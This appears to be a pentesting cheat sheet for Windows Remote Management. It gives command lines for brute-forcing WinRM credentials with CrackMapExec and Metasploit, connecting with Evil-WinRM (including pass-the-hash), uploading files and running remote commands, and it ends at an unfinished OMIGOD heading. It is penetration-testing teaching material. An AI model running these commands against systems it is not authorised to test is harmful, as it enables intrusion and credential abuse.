WinRM (Windows Remote Management) Pentesting
Last modified: 2023-10-22
The Microsoft implementation of WS-Management Protocol which provides a common way for systems to access and exchange management information across an IT infrastructure. Default ports are 5985 (HTTP), 5986 (HTTPS), and also used 47001.
Enumeration
Brute Force Credentials
# CrackMapExec
poetry run crackmapexec winrm <target-ip> -d DomainName -u usernames.txt -p passwords.txt
# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_login
Evil-WinRM
Evil-WinRM is a Windows Remote Management shell for pentesting.
Below are list of commands for each situation.
Connect
evil-winrm -i <target-ip> -u username -p password
# -P: Specifify port
evil-winrm -i <target-ip> -P 5986 -u username -p password
# Pass The Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc
# PowerShell Local Path (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts
# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -S
If you have private key and public key, you can use them for authentication.
# -S: SSL
# -k: private key
# -c: public key
evil-winrm -i <target-ip> -S -k private.key -c public.key
Commands
After connecting, we can use a lot of useful commands to exploit.
Note that we need to specify the absolute path for uploading and downloading.
# Upload a local file to Windows machine
PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat
# Download a file to local
PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt
# List all services
PS> services
CrackMapExec
CrackMapExec is a swiss army knife for pentesting networks.
The official docs says that it's recommended to use it via Poetry which is a Python package manager.
First off, move to the directory in which the CrackMapExec installed and run poetry install.
cd crackmapexec
poetry install
Then execute with poetry run.
# Login and CMD execution (-x)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -p password -x 'whoami'
# Login and PowerShell execution (-X)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -p password -X '$PSVersionTable'
# Pass the Hash and CMD execution (-x)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -H <HASH> -x 'whoami'
# Pass the Hash and PowerShell execution (-X)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -H <HASH> -X '$PSVersionTable'
OMIGOD (CVE-2021-38647)
Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE).
There are many PoC available, for instance: